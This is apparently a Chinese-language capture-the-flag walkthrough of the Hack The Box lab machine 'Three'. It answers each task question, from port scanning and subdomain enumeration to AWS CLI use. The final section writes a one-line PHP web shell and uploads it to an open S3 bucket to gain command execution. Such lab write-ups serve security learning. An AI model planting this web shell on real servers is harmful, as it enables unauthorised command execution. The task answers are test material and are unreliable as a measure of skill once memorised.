前言
第一层 Three
aws的使用
至此,Tier 1 free complete
Task1
How many TCP ports are open?
打开了多少个 TCP 端口?
A:2
开扫
nmap -A 10.129.141.55
开了22和80两个端口
Task2
What is the domain of the email address provided in the "Contact" section of the website?
网站“联系人”部分提供的电子邮件地址的域是什么?
A:thetoppers.htb
访问网站,查看Contact
Task3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?
A:/etc/hosts
把域名写入到hosts,这样我们就能访问了
echo "10.129.141.55 thetoppers.htb" >> /etc/hosts
Task4
Which sub-domain is discovered during further enumeration?
在进一步枚举期间发现哪个子域?
A:s3.thetoppers.htb
爆破子域名
gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain
有个404,就是这个了
Task5
Which service is running on the discovered sub-domain?
发现的子域上运行的是哪个服务?
A:amazon s3
将上面的s3子域加入hosts文件中,并访问s3子域(我这里重启了靶机,ip变了
最折磨的部分,因为服务器的s3子域名极不稳定会返回502,我这里等了几十分钟才连上
Task6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
哪个命令行实用程序可用于与发现的子域上运行的服务进行交互?
A:awscli
Task7
Which command is used to set up the AWS CLI installation?
哪个命令用于设置 AWS CLI 安装?
A:aws configure
这里aws报错的需要pip更新一下pyopenssl
安装aws
apt install awscli -y
然后配置
aws configure
Task8
What is the command used by the above utility to list all of the S3 buckets?
上述实用程序使用什么命令列出所有 S3 存储桶?
A:aws s3 ls
Task9
This server is configured to run files written in what web scripting language?
此服务器配置为运行用哪种 Web 脚本语言编写的文件?
A:php
Submit Flag
使用命令通过指定的 S3 端点连接到 s3.thetoppers.htb
,然后列出 thetoppers.htb
存储桶中的对象
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
接着我们在本地写个马
echo '<?php system($_GET["cmd"]); ?>' > shell.php
传马
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
然后访问这个马getshell即可